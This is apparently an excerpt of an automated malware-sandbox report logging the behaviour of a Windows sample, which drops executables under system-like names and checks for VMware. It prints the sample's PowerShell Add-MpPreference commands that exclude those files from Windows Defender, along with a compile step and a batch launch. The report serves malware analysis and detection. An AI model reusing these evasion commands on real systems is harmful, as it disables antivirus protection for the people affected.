                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Memory allocated: 7E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Memory allocated: 1A4B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Favorites\lsass.exe; Memory allocated: 1550000 memory reserve | memory write watch
                    Source: C:\Users\user\Favorites\lsass.exe; Memory allocated: 1B0A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Favorites\lsass.exe; Memory allocated: 7C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Favorites\lsass.exe; Memory allocated: 1A6A0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Memory allocated: FA0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Memory allocated: 1ABA0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Memory allocated: 2DC0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Memory allocated: 1ADC0000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: F80000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: 1AB20000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: 770000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: 1A2A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Memory allocated: D10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Memory allocated: 1A990000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Memory allocated: 13D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Memory allocated: 1AE70000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe; Memory allocated: 7F0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe; Memory allocated: 1A320000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe; Memory allocated: 9B0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe; Memory allocated: 1A570000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: C30000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: 1A750000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Memory allocated: 1770000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Memory allocated: 1B2A0000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: 2560000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Memory allocated: 1A7E0000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exe; Code function: 55_2_00007FFD9B8872AB sgdt fword ptr [eax]
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Favorites\lsass.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Favorites\lsass.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5454
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5496
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6218
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5877
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5620
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5699
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\uhdUZoxx.log
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\AsBtWtog.log
                    Source: C:\Recovery\USZqVcJFLA.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\EDQjSEMY.log
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\vnccfbfp.log
                    Source: C:\Recovery\USZqVcJFLA.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\bSdYXpxm.log
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\RzSYqgUu.log
                    Source: C:\Recovery\USZqVcJFLA.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\oBKeyAWK.log
                    Source: C:\Recovery\USZqVcJFLA.exe; Dropped PE file which has not been started: C:\Users\user\Desktop\OljzCgRG.log
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe TID: 6712; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Favorites\lsass.exe TID: 8; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Favorites\lsass.exe TID: 8096; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe TID: 8060; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe TID: 8116; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 8064; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 8092; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628; Thread sleep count: 5454 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928; Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616; Thread sleep count: 5496 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944; Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648; Thread sleep count: 6218 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940; Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820; Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624; Thread sleep count: 5877 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936; Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636; Thread sleep count: 5620 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932; Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828; Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640; Thread sleep count: 5699 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948; Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe TID: 8176; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe TID: 8164Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 6712Thread sleep time: -30000s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 2844Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 6668Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: USZqVcJFLA.exe, 00000035.00000002.1995738292.00000000008D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss}
                    Source: JNKHlxGvw4.exe, 00000000.00000002.1831258606.00000000006C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\I8
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeProcess token adjusted: Debug
                    Source: C:\Recovery\USZqVcJFLA.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeProcess token adjusted: Debug
                    Source: C:\Recovery\USZqVcJFLA.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"
